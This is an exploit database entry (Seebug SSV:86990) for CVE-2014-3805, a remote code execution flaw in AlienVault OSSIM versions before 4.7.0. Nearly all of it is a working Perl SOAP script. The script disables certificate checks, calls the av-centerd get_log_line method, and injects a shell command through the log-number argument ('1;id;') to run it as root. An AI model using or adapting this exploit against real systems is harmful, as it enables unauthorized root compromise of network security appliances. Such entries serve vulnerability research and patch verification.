Lucene search

K
seebugRootSSV:86990
HistoryJul 01, 2014 - 12:00 a.m.

AlienVault OSSIM < 4.7.0 - av-centerd 'get_log_line()' Remote Code Execution

2014-07-0100:00:00
Root
www.seebug.org
13

0.605 Medium

EPSS

Percentile

97.8%

No description provided by source.


                                                # Exploit Title: AlienVault OSSIM &#60; 4.7.0 av-centerd &#39;get_log_line()&#39; Remote Code Execution
# Date: 06/17/2014
# Exploit Author: Alfredo Ramirez
# Vendor Homepage: http://www.alienvault.com/
# Software Link: http://www.alienvault.com/open-threat-exchange/projects
# Version: &#60; 4.7.0
# Tested on: Debian/Virtual Appliance
# CVE : CVE-2014-3805

 #!perl -w

  use SOAP::Lite;

  # SSL is self-signed so we have to ignore verification.
  $ENV{PERL_LWP_SSL_VERIFY_HOSTNAME}=0;

  # We simply append the &#39;id&#39; command to the number of log we want to
  # read.
  @soap_response = SOAP::Lite
    -&#62; uri(&#39;AV/CC/Util&#39;)
    -&#62; proxy(&#39;https://172.26.22.2:40007/av-centerd&#39;)
    -&#62; get_log_line(&#39;All&#39;, &#39;423d7bea-cfbc-f7ea-fe52-272ff7ede3d2&#39; ,&#39;172.26.22.1&#39;, &#39;test&#39;, &#39;/var/log/auth.log&#39;, &#39;1;id;&#39;)
    -&#62; result;

  for (@{ $soap_response[0] }) {
   print &#34;$_\n&#34;;
  }

  # If vulnerable output will be: uid=0(root) gid=0(root) groups=0(root)